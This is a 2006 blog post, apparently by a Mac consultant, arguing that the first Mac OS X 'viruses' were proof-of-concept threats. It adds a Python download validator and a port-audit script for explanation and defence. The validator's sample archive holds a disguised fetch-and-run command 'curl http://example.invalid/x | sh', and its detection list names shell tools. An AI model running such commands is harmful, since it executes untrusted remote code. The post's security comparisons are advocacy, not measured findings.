My parents are the type that are paranoid about identity theft and are always worried about the world at large compromising their sensitive financial data. So naturally, when they read about the new Mac viruses, my mother called me up specifically to ask whether or not it was still OK to submit her credit card information over the internet. As soon as this happened, I knew that something was wrong.
The short month of February brought with it a huge media frenzy about the first Mac OS X viruses. Many were saying that it was only a matter of time before the Mac, which has had no viruses, would be targeted, and that a domino effect of spyware, malware and popups would follow: all of the things Mac users get to laugh at, and they would no longer be laughing.
- Business Week: Macs, Safe No More? - Recent malware outbreaks suggest that Apple’s computers are now targets of viruses and trojans.
- USA Today: Security Scares Mount for Apple Macintosh Users
- E*Week: Apple’s Switch to Intel Could Allow OS X Exploits
- and the list goes on and on.
It is true that the past month saw “viruses”, as the media called them, for the Mac OS X platform. The first is called OSX/Leap.A (also OSX/Oompa-A); the second is a flaw in Apple’s popular web browser, Safari; the third is a “worm”, OSX/Inqtana-A, that spreads through a vulnerability in Apple’s Bluetooth support. However, none of these “viruses” has been found spreading in the wild; they are proof-of-concept code or plain vulnerabilities.
OS X/Leap.A/Oompa-A
“Leap-A, which appears to affect only the OS X 10.4 platform, spreads primarily via the Apple iChat instant-messaging program. The program forwards itself as a compressed file called “latestpics.tgz” to all the contacts on the infected user’s buddy list each time the program starts up.
But it’s up to the person to download the file, which shows up as an attachment to a conversation thread. If downloaded, the self-executable file masquerades with an icon typically reserved for image files but does not activate itself unless opened. (CNet.com)”
Even if someone does send you the “latestpics.tgz” file, your computer will not be infected unless you explicitly unpack the archive, open the file inside it, and then give it your password so it can run.
“The Leap-A malware was a poorly-programmed Trojan horse that relied on “social engineering,” or trickery to perform its nasty function. There’s a simple way to protect against this kind of threat — common sense — and in testament to this, a lot of people didn’t fall for it.
I’m not going to catch a virus this way any more than I’m going to send money to the honorable Dr. Mobuntu, head of the Central Bank of Nigeria.
When it comes to Leap-A, I’ll continue practicing the same common-sense precautions I take when using a Windows machine, like not opening any “nude pictures” of Britney Spears I get in e-mail.(Wired)” writes Leander Kahney.
Apple’s Official Policy concerning this is: “Leap-A is not a virus, it is malicious software that requires a user to download the application and execute the resulting file. Apple always advises Macintosh users to only accept files from vendors and Web sites that they know and trust.” Apple provides a guide to safely handling files received from the Internet here.
Safari Critical Flaw
This flaw is indeed critical; however, it was released as a proof of concept. That means the exploit has been shown to work, but to date there has been no report of systems actually being affected (more on “proof of concept” further in the article).
“The option to “Open ’safe’ files after downloading” in Apple’s Safari web browser has an issue. “This feature is activated by default. Its function is to automatically display images and movies after they are transmitted to the user’s computer, using the application assigned to that particular document format. Safari will also unpack ZIP archives and display the documents within if they are considered ’safe.’ If active content such as an application or shell script is found within the archive, a prompt requests user confirmation. So far, so good,” Heise Online reports. “Problems ensue if a shell script is stored into a ZIP archive without the so-called shebang line. If this line is omitted, Safari no longer recognizes the content as potentially dangerous and executes shell commands without a confirmation prompt. This behavior has been discovered by Michael Lehn, who has documented it on a web site.(Heise Online).”
The simple mitigation is to turn off “Open ’safe’ files after downloading” in Safari’s General preferences, so that nothing a web site sends you is opened until you choose to open it.
Since these flaws were exposed, Apple has released a security update that addresses both issues: Apple Security Update 2006-001, available via Software Update or for download from Apple’s Support site. Apple says the update addresses the following:
- iChat. A malicious application named Leap.A that attempts to propagate using iChat has been detected. With this update for Mac OS X v10.4.5 and Mac OS X Server v10.4.5, iChat now uses Download Validation to warn of unknown or unsafe file types during file transfers
- Safari, LaunchServices. CVE-ID: CVE-2006-0848. Available for: Mac OS X v10.3.9, Mac OS X Server v10.3.9, Mac OS X v10.4.5, Mac OS X Server v10.4.5. Impact: Viewing a malicious web site may result in arbitrary code execution. Description: It is possible to construct a file which appears to be a safe file type, such as an image or movie, but is actually an application. When the “Open `safe’ files after downloading” option is enabled in Safari’s General preferences, visiting a malicious web site may result in the automatic download and execution of such a file. A proof-of-concept has been detected on public web sites that demonstrates the automatic execution of shell scripts. This update addresses the issue by performing additional download validation so that the user is warned (in Mac OS X v10.4.5) or the download is not automatically opened (in Mac OS X v10.3.9).
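The Heise description of the Safari flaw and Apple’s “download validation” fix both come down to one question: does the validator decide what a file is from its name and a shebang line, or from its bytes? The following is an added example written for this post; it is not Apple’s code and not the proof of concept Heise describes. It models the weak check as the post describes it (a shell script with no “#!” line is treated as a safe file) next to a content-based check that refuses to auto-open anything whose bytes do not match the type its name claims. The SHELL_HINTS tokens and the sample archive are constructed for the example.

```python
"""Content-based check for "safe" downloads (added example, not Apple's code)."""
import io
import zipfile

# Real file signatures for the media types a browser would auto-open.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Mach-O (32/64-bit, either byte order) and fat/universal binary magic.
MACHO_MAGIC = (b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
               b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe", b"\xca\xfe\xba\xbe")
# Heuristic tokens that mark plain text as a shell script even without a
# shebang. This list is an assumption of the example, not an exhaustive one.
SHELL_HINTS = (b"rm -rf", b"curl ", b"/bin/sh", b"sudo ", b"osascript",
               b"chmod ", b"| sh", b"$HOME")


def extension(name: str) -> str:
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_type(data: bytes) -> str:
    """Classify a file by its leading bytes and content, never by its name."""
    if data.startswith(b"#!"):
        return "script"
    if data.startswith(MACHO_MAGIC):
        return "executable"
    if any(data.startswith(magic) for magic in IMAGE_MAGIC.values()):
        return "image"
    try:
        data.decode("ascii")
    except UnicodeDecodeError:
        return "unknown-binary"
    if any(hint in data for hint in SHELL_HINTS):
        return "script"
    return "text"


def naive_is_safe(data: bytes) -> bool:
    """The pre-patch logic as the post describes it: active content is
    recognised only by a leading "#!", so a shebang-less script passes."""
    return not data.startswith(b"#!")


def robust_is_safe(name: str, data: bytes) -> bool:
    """Auto-open only when the name claims an image AND the bytes are an image."""
    return extension(name) in IMAGE_MAGIC and detect_type(data) == "image"


def classify_archive(zip_bytes: bytes) -> list:
    """Inspect every member of a ZIP the way a download validator should."""
    results = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info.filename)
            results.append({
                "name": info.filename,
                "claimed": extension(info.filename),
                "detected": detect_type(data),
                "naive_safe": naive_is_safe(data),
                "robust_safe": robust_is_safe(info.filename, data),
            })
    return results


def build_sample_archive() -> bytes:
    """Constructed sample archive: a real-looking JPEG header, a shebang-less
    shell script named like a picture, and an ordinary script with a shebang."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)
        zf.writestr("latestpics.jpg", b"curl http://example.invalid/x | sh\n")
        zf.writestr("setup.sh", b"#!/bin/sh\necho hello\n")
    return buf.getvalue()


if __name__ == "__main__":
    for r in classify_archive(build_sample_archive()):
        print(f"{r['name']:16} claims {r['claimed']:4} is {r['detected']:14} "
              f"naive={r['naive_safe']!s:5} robust={r['robust_safe']}")
```

Run as a script, the table shows the disagreement that matters: “latestpics.jpg” is “safe” to the shebang check and a script to the content check. The image magic numbers are real; the shell-token heuristic is deliberately crude, and a real validator would also check the resource fork and Launch Services metadata that decide which application opens a file.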
OSX/Inqtana-A
This flaw was fixed in 2005 and is addressed in Apple Security Update 2005-005, so why it is receiving press attention in February 2006, as if it were a brand new “virus” or security hole, is unknown to me.
Mac OS X Security vs. Windows Security
First and foremost, concerning these “viruses” for Mac OS X: as it stands, there are still NO cases of Mac OS X viruses in the wild, ZERO. Second, if you have the latest Apple updates installed, you are not affected by the flaws discussed above. Bingo, done, no worries. Now that this has been addressed, let’s go on.
Many are worrying that more Mac viruses will appear because Apple is now using Intel processors, the same processors that run Windows. But the major viruses out there take advantage of flaws and bugs in the operating system and the software running on it, not in the processor underneath: a Windows worm targets Windows services and Windows bugs, and those do not exist on Mac OS X just because the chip is the same. What the shared processor does give an attacker is familiarity, since x86 exploitation techniques carry over, but a payload still has to be written for Mac OS X’s system calls and file layout. It is like cars: we all use gasoline to power them, but a defect in a Honda does not mean the same defect exists in a Ford.
That is not to say that the Mac OS X platform is not vulnerable. No system is 100% safe, since any system is going to have bugs and flaws. The difference is in what happens when those flaws are exploited. The Mac, which is built on UNIX, starts from a stronger position because of how it is laid out: privileges are separated between user accounts and the system, and few network services run by default (more on both below). The Mac, like Windows, has security advisories released regularly.
Many people are bringing to light the number of security advisories out there for Mac OS X. Yes, they exist; again, no system is 100% safe. But these advisories have appeared steadily since Mac OS X’s inception. A flaw or bug in a system does not by itself result in a virus being released. In fact, Mac OS X has had close to the same number of security advisories as Windows over the past few years, as the following charts show.
Just because a vulnerability exists does not mean it is going to harm anyone. For a vulnerability to affect people there has to be a working exploit, and then something that actually uses it against them. Apple releases fixes every so often for these vulnerabilities, just as Microsoft releases patches for its flaws. The Safari issue was a proof of concept: there was no malicious exploit in circulation, and the issue has since been addressed. Since Mac OS X is based on UNIX, many of its components are open source and their code is already public. That does not mean every flaw is already known, but it does mean the code can be audited by anyone, and fixes from the upstream projects flow into Apple’s updates. In fact, “many of the fixes in typical Mac OS X security updates aren’t Mac-specific,” Gruber says, “but rather are updates to open-source components and tools.” This keeps Mac OS X’s UNIX underpinnings current with the open-source communities’ updates, fixes and contributions.
The gap between vulnerabilities and exploits is one of the key differences in security between Mac OS X and Windows. Far more Windows vulnerabilities have ended up with working exploits in circulation, and many of those with worms or malware using them; on Mac OS X, the system architecture (services off by default, privileges separated) means far fewer of its vulnerabilities ever turn into exploits that reach users, and that is why Mac OS X is inherently more secure than Windows.
- “Windows comes with five of its ports open; Mac OS X comes with all of them shut and locked. (Ports are back-door channels to the Internet: one for instant-messaging, one for Windows XP’s remote-control feature, and so on.) (NY Times)” Ports are like doors from your computer to the internet. If there are doors open that you do not even know exist, you cannot close them, and of course it is going to be easier for an attacker to compromise your system. “At the very least, from the all-important network perspective, unlike Windows, Mac OS X ships with nearly all internet services turned off by default. Place an out-of-the-box Mac OS X installation on a network, and an attacker doesn’t have much to target in trying to compromise your system. A default installation of Windows, on the other hand, shows up like a big red bulls-eye on a network with numerous network services enabled and running. And, unlike Windows, with Mac OS X, there’s no hard-to-disable (for average users afraid to tweak things unfamiliar to them, that is) “Messaging Services” that results in spam-like advertisements coming into the system by way of Windows-based pop-up message boxes. And, the Unix-based Mac OS X system firewall – simple enough protection for most users — is enabled by default (in Mac OSX Server) and easy to find and configure in Mac OS X Client software (not that there’s much that users need to worry about out-of-the-box anyway) — something that Microsoft only recently realized was a good idea and acknowledged should be done in Windows clients as well. (The Register)”
- “When a program tries to install itself in Mac OS X or Linux, a dialog box interrupts your work and asks you permission for that installation — in fact, requires your account password. Windows XP goes ahead and installs it, potentially without your awareness (NY Times).” Whenever a program needs to install something, those familiar with Mac OS X will recognize the password dialog that pops up. If you do not know what is going on and did not ask for an application to be installed, you are not going to type in your password, so the virus, or whatever it is, is stopped before it can even run. The fact that many commercial Windows programs show an interface while installing is just convenience. As the NY Times article says, installing something on Windows does not require your account password, so a virus can do it in the background, and with no interface showing its activity it is invisible to the user. Note that the password prompt only guards what needs elevated privileges: a program you choose to run already has everything your own account has, including your files and your iChat buddy list.
- “Unlike Windows, Mac OS X requires an administrator password to change certain configurations, run the system updater, and when installing new software. From a security perspective, this is another example of how Apple takes a proactive approach to system-level security. If a virus, remote hacker, or co-worker tries to install or reconfigure something on the system, they’re stymied without knowing the administrator’s password stored in the hardened System Keychain. (Incidentally, this password is not the same as the Unix ‘root’ account password of the system’s FreeBSD foundation, something that further enhances security.) In some ways, this can be seen as Mac OS X protecting a careless user from themself as well as others. (The Register)” “Administrator accounts in Windows (and therefore viruses that exploit it) have access to all areas of the operating system. In Mac OS X, even an administrator can’t touch the files that drive the operating system itself. A Mac OS X virus (if there were such a thing) could theoretically wipe out all of your files, but wouldn’t be able to access anyone else’s stuff — and couldn’t touch the operating system itself (NY Times).” The core of Mac OS X lives in /System/Library, which is owned by root; even an administrator cannot modify it without authenticating for elevated privileges. Third-party additions go in /Library, which requires an administrator password, and per-user additions in ~/Library, which requires none, so a program that is only able to modify the user’s own domain cannot damage the core of the system.
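The first of the points above, that a default Mac OS X has almost nothing listening on the network while a default Windows does, is easy to verify on your own machine rather than take on faith: `netstat -an` lists every socket, and the ones an attacker can reach are those in LISTEN (or bound UDP sockets) on an address other than loopback. The following is an added example for this post, not code from Apple or the quoted articles. It parses BSD-style `netstat -an` output (the format Mac OS X prints, with the port appended to the address after a dot) and reports which sockets accept traffic from other hosts. The sample output is constructed for the example, not captured from a real machine.

```python
"""Audit of listening sockets from `netstat -an` output (added example)."""

# Constructed sample in the BSD/Mac OS X netstat format; not a real capture.
SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.22                   *.*                    LISTEN
tcp4       0      0  127.0.0.1.631          *.*                    LISTEN
tcp6       0      0  ::1.631                *.*                    LISTEN
tcp4       0      0  192.168.1.5.49152      17.250.0.1.443         ESTABLISHED
udp4       0      0  *.5353                 *.*
udp4       0      0  127.0.0.1.49200        *.*
"""

# Addresses that only the local machine can reach.
LOOPBACK = ("127.", "::1")


def split_endpoint(endpoint: str):
    """'127.0.0.1.631' -> ('127.0.0.1', 631); '*.22' -> ('*', 22).
    netstat on BSD systems separates the port with a dot, so split on the last one."""
    host, port = endpoint.rsplit(".", 1)
    return host, int(port)


def is_exposed(host: str) -> bool:
    """A socket bound to the wildcard ('*') or to a non-loopback address is
    reachable from the network; a loopback-only socket is not."""
    return not host.startswith(LOOPBACK)


def listening_sockets(netstat_output: str) -> list:
    """One record per socket that accepts traffic: TCP sockets in LISTEN and
    bound UDP sockets (UDP lines carry no state column)."""
    found = []
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith(("tcp", "udp")):
            continue  # banner, header, or something that is not a socket line
        proto, local, foreign = fields[0], fields[3], fields[4]
        state = fields[5] if len(fields) > 5 else ""
        if proto.startswith("tcp") and state != "LISTEN":
            continue  # established or closing connections are not services
        if proto.startswith("udp") and foreign != "*.*":
            continue  # a connected UDP socket is a client, not a listener
        host, port = split_endpoint(local)
        found.append({"proto": proto, "host": host, "port": port,
                      "exposed": is_exposed(host)})
    return found


def exposed_ports(netstat_output: str) -> list:
    """Sorted (proto, port) pairs reachable from other hosts: what a port scan
    of the machine would actually find."""
    return sorted({(s["proto"], s["port"])
                   for s in listening_sockets(netstat_output) if s["exposed"]})


if __name__ == "__main__":
    # On a real machine: replace SAMPLE_NETSTAT with the output of `netstat -an`.
    for sock in listening_sockets(SAMPLE_NETSTAT):
        flag = "EXPOSED " if sock["exposed"] else "local   "
        print(f"{flag}{sock['proto']:5} {sock['host']}:{sock['port']}")
    print("reachable from the network:", exposed_ports(SAMPLE_NETSTAT))
```

In the constructed sample, only ssh (TCP 22) and Bonjour (UDP 5353) are reachable from other hosts; the CUPS printing port 631 is bound to loopback on both IPv4 and IPv6 and so does not count. That distinction, between what is running and what is reachable, is the one to make before worrying about an advisory for a given service.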
A study done by the SANS Institute Internet Storm Center reveals that “an unpatched Windows PC connected to the Internet will last for only about 20 minutes before it’s compromised by malware, on average. That figure is down from around 40 minutes, the group’s estimate in 2003. (CNet.com)” “As the SANS Institute notes, 20 minutes is not long enough to update your Windows PC before it is too late.(The Register) ” The full report is available here.
If any of my clients can prove that their Mac has been infected with a virus, I will personally buy them a new $2000 system of their choice. “You have to be able to prove that a Mac running Mac OS X (version 10.0 or greater, and patched to the latest security level available at the time from Apple) was accidentally and detrimentally infected with a virus that exploited a flaw in the base Mac OS X installation. Your computer must have SUFFERED FROM A REAL, LIVE VIRUS THAT ALREADY EXISTED! (Whilshipley.com)”, and the virus must have been able both to spread and to infect. Your system will not count if it was infected by a “virus” that was merely created to show that viruses can exist on Mac OS X.
